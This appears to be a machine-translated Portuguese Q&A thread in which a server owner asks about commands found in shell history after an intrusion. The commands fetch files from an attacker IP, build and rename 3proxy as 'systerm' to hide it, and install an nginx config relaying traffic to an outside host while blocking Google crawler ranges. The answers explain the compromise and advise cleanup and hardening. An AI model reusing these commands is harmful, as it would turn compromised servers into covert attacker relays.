Alguém invadiu meu servidor privado e eu encontrei o comando abaixo do histórico da linha de comando. Qualquer corpo pode explicar o que isso significa?
1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx
e
2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &
Alguém aparentemente baixou e instalou o nginx (um servidor da web) e 3proxy (um servidor proxy).
Então eu acho que o seu servidor é usado agora como um proxy intermediário pelos hackers. Desinstalar e remover esses servidores seria o melhor curso de ação para mim. (além de reforçar sua segurança, é claro; -)
Está tentando instalar um servidor da web e um proxy com as seguintes configurações:
user www-data;
worker_processes 2;
error_log logs/error.log notice;
worker_rlimit_nofile 10240;
events { worker_connections 8192; use epoll; }
http {
include mime.types;
access_log off;
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 0;
server_tokens off;
server_names_hash_bucket_size 64;
#//G
deny 64.233.160.0/19;
deny 66.102.0.0/20;
deny 66.249.64.0/19;
deny 72.14.192.0/18;
deny 74.125.0.0/16;
deny 89.207.224.0/24;
deny 193.142.125.0/24;
deny 194.110.194.0/24;
deny 209.85.128.0/17;
deny 216.239.32.0/19;
server {
listen 8080;
location ~* ^.+\.(gif|png|jpg)$ {
root /var/tmp/$host;
error_page 404 = @fetch;
}
location @fetch {
internal;
proxy_pass http://serverparkhosting.com:4480;
proxy_redirect off;
proxy_ignore_client_abort on;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_buffers 400 50k;
proxy_read_timeout 300;
proxy_send_timeout 300;
proxy_store /var/tmp/$host/$uri;
proxy_store_access user:rw group:rw all:r;
root /var/tmp/$host;
}
location / {
proxy_pass http://serverparkhosting.com:4480;
proxy_redirect off;
proxy_ignore_client_abort on;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $host;
proxy_buffers 100 50k;
proxy_read_timeout 300;
proxy_send_timeout 300;
}
location = /info { stub_status on; }
}
}
Como outros já disseram, seu servidor foi comprometido por outra pessoa. Depois de ter recuperado, removendo e / ou reinstalando, você deve considerar seriamente a implementação de uma segurança muito básica. Um bom lugar para começar são os manuais de segurança de sua distribuição linux e talvez algo como os roteiros de tigres .
Tags command-line wget linux